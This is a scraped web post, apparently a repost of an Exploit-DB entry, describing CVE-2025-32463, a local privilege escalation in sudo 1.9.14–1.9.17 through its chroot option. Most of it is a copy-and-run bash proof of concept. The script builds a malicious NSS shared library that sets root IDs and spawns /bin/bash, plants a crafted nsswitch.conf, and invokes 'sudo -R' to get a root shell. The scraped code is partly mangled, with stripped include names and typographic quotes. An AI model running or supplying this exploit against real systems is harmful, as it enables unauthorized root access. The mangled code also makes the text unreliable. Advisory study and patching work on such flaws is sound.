\nExploit Title: Sudo chroot 1.9.17 – Local Privilege Escalation
\n
Google Dork: not aplicable
\n
Date: Mon, 30 Jun 2025
\n
Exploit Author: Stratascale
\n
Vendor Homepage:https:\/\/salsa.debian.org\/sudo-team\/sudo
\n
Software Link:
\n
Version: Sudo versions 1.9.14 to 1.9.17 inclusive
\n
Tested on: Kali Rolling 2025-7-3
\n
CVE : CVE-2025-32463<\/p>\n
*Version running today in Kali:*
\n
https:\/\/pkg.kali.org\/news\/640802\/sudo-1916p2-2-imported-into-kali-rolling\/<\/p>\n
*Background*<\/p>\n
An attacker can leverage sudo’s -R (–chroot) option to run
\n
arbitrary commands as root, even if they are not listed in the
\n
sudoers file.<\/p>\n
Sudo versions affected:<\/p>\n
Sudo versions 1.9.14 to 1.9.17 inclusive are affected.<\/p>\n
CVE ID:<\/p>\n
This vulnerability has been assigned CVE-2025-32463 in the
\n
Common Vulnerabilities and Exposures database.<\/p>\n
Details:<\/p>\n
Sudo’s -R (–chroot) option is intended to allow the user to
\n
run a command with a user-selected root directory if the sudoers
\n
file allows it. A change was made in sudo 1.9.14 to resolve
\n
paths via chroot() using the user-specified root directory while
\n
the sudoers file was still being evaluated. It is possible for
\n
an attacker to trick sudo into loading an arbitrary shared
\n
library by creating an \/etc\/nsswitch.conf file under the
\n
user-specified root directory.<\/p>\n
The change from sudo 1.9.14 has been reverted in sudo 1.9.17p1
\n
and the chroot feature has been marked as deprecated. It will
\n
be removed entirely in a future sudo release. Because of the
\n
way sudo resolves commands, supporting a user-specified chroot
\n
directory is error-prone and this feature does not appear to
\n
be widely used.<\/p>\n
A more detailed description of the bug and its effects can be
\n
found in the Stratascale advisory:
\n
https:\/\/www.stratascale.com\/vulnerability-alert-CVE-2025-32463-sudo-chroot<\/p>\n
Impact:<\/p>\n
On systems that support \/etc\/nsswitch.conf a user may be able
\n
to run arbitrary commands as root.<\/p>\n
*Exploit:*<\/p>\n
*Verify the sudo version running: sudo –versionIf is vulnerable, copy and
\n
paste the following code and run it.*
\n
*———————-*
\n
#!\/bin\/bash
\n
# sudo-chwoot.sh \u2013 PoC CVE-2025-32463
\n
set -e<\/p>\n
STAGE=$(mktemp -d \/tmp\/sudowoot.stage.XXXXXX)
\n
cd “$STAGE”<\/p>\n
# 1. NSS library
\n
cat > woot1337.c <<'EOF'\n
#include
\n
#include <\/p>\n__attribute__((constructor))
\n
void woot(void) {
\n
setreuid(0,0); \/* change to UID 0 *\/
\n
setregid(0,0); \/* change to GID 0 *\/
\n
chdir(“\/”); \/* exit from chroot *\/
\n
execl(“\/bin\/bash”,”\/bin\/bash”,NULL); \/* root shell *\/
\n
}
\n
EOF<\/p>\n
# 2. Mini chroot with toxic nsswitch.conf
\n
mkdir -p woot\/etc libnss_
\n
echo “passwd: \/woot1337” > woot\/etc\/nsswitch.conf
\n
cp \/etc\/group woot\/etc # make getgrnam() not fail<\/p>\n
# 3. compile libnss_
\n
gcc -shared -fPIC -Wl,-init,woot -o libnss_\/woot1337.so.2 woot1337.c<\/p>\n
echo “[*] Running exploit\u2026”
\n
sudo -R woot woot # (-R
)
\n
# \u2022 the first \u201cwoot\u201d is chroot
\n
# \u2022 the second \u201cwoot\u201d is and inexistent
\n
command
\n
# (only needs resolve the user)<\/p>\nrm -rf “$STAGE”
\n
*———————-*\n<\/div>\n
View Full Exploit Details<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"Exploit Details Basic Information Exploit Title Sudo chroot 1.9.17 – Local Privilege Escalation Exploit ID EDB-ID:52352 Type exploitdb Published 2025-07-08T00:00:00 Modified 2025-07-08T00:00:00 CVSS Information CVSS…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[9,6,8,55,12,40,13,7,11,5],"class_list":["post-7825","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-critical","tag-cve","tag-cvss","tag-cvss-93","tag-exploit","tag-exploitdb","tag-news","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n
Sudo chroot 1.9.17 - Local Privilege Escalation - zero redgem<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zero.redgem.net\/?p=7825\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Sudo chroot 1.9.17 - Local Privilege Escalation - zero redgem\" \/>\n<meta property=\"og:description\" content=\"Exploit Details Basic Information Exploit Title Sudo chroot 1.9.17 – Local Privilege Escalation Exploit ID EDB-ID:52352 Type exploitdb Published 2025-07-08T00:00:00 Modified 2025-07-08T00:00:00 CVSS Information CVSS...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zero.redgem.net\/?p=7825\" \/>\n<meta property=\"og:site_name\" content=\"zero redgem\" \/>\n<meta property=\"article:published_time\" content=\"2025-07-08T13:35:53+00:00\" \/>\n<meta name=\"author\" content=\"invoker\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"invoker\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"2 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=7825#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=7825\"},\"author\":{\"name\":\"invoker\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\"},\"headline\":\"Sudo chroot 1.9.17 – Local Privilege Escalation\",\"datePublished\":\"2025-07-08T13:35:53+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=7825\"},\"wordCount\":401,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"keywords\":[\"CRITICAL\",\"CVE\",\"CVSS\",\"CVSS-9.3\",\"exploit\",\"exploitdb\",\"news\",\"Security\",\"tapic\",\"Vulnerability\"],\"articleSection\":[\"category_exploit\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=7825#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=7825\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?p=7825\",\"name\":\"Sudo chroot 1.9.17 - Local Privilege Escalation - zero redgem\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\"},\"datePublished\":\"2025-07-08T13:35:53+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=7825#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=7825\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=7825#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zero.redgem.net\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Sudo chroot 1.9.17 – Local Privilege Escalation\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"name\":\"zero redgem\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zero.redgem.net\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\",\"name\":\"zero redgem\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"\",\"contentUrl\":\"\",\"width\":191,\"height\":188,\"caption\":\"zero redgem\"},\"image\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\",\"name\":\"invoker\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"caption\":\"invoker\"},\"sameAs\":[\"https:\\\/\\\/zero.redgem.net\"],\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Sudo chroot 1.9.17 - Local Privilege Escalation - zero redgem","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zero.redgem.net\/?p=7825","og_locale":"en_US","og_type":"article","og_title":"Sudo chroot 1.9.17 - Local Privilege Escalation - zero redgem","og_description":"Exploit Details Basic Information Exploit Title Sudo chroot 1.9.17 – Local Privilege Escalation Exploit ID EDB-ID:52352 Type exploitdb Published 2025-07-08T00:00:00 Modified 2025-07-08T00:00:00 CVSS Information CVSS...","og_url":"https:\/\/zero.redgem.net\/?p=7825","og_site_name":"zero redgem","article_published_time":"2025-07-08T13:35:53+00:00","author":"invoker","twitter_card":"summary_large_image","twitter_misc":{"Written by":"invoker","Est. reading time":"2 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zero.redgem.net\/?p=7825#article","isPartOf":{"@id":"https:\/\/zero.redgem.net\/?p=7825"},"author":{"name":"invoker","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca"},"headline":"Sudo chroot 1.9.17 – Local Privilege Escalation","datePublished":"2025-07-08T13:35:53+00:00","mainEntityOfPage":{"@id":"https:\/\/zero.redgem.net\/?p=7825"},"wordCount":401,"commentCount":0,"publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"keywords":["CRITICAL","CVE","CVSS","CVSS-9.3","exploit","exploitdb","news","Security","tapic","Vulnerability"],"articleSection":["category_exploit"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zero.redgem.net\/?p=7825#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zero.redgem.net\/?p=7825","url":"https:\/\/zero.redgem.net\/?p=7825","name":"Sudo chroot 1.9.17 - Local Privilege Escalation - zero redgem","isPartOf":{"@id":"https:\/\/zero.redgem.net\/#website"},"datePublished":"2025-07-08T13:35:53+00:00","breadcrumb":{"@id":"https:\/\/zero.redgem.net\/?p=7825#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zero.redgem.net\/?p=7825"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/zero.redgem.net\/?p=7825#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zero.redgem.net\/"},{"@type":"ListItem","position":2,"name":"Sudo chroot 1.9.17 – Local Privilege Escalation"}]},{"@type":"WebSite","@id":"https:\/\/zero.redgem.net\/#website","url":"https:\/\/zero.redgem.net\/","name":"zero redgem","description":"","publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zero.redgem.net\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zero.redgem.net\/#organization","name":"zero redgem","url":"https:\/\/zero.redgem.net\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/","url":"","contentUrl":"","width":191,"height":188,"caption":"zero redgem"},"image":{"@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca","name":"invoker","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","caption":"invoker"},"sameAs":["https:\/\/zero.redgem.net"],"url":"https:\/\/zero.redgem.net\/?author=1"}]}},"_links":{"self":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/7825","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=7825"}],"version-history":[{"count":0,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/7825\/revisions"}],"wp:attachment":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=7825"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=7825"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=7825"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}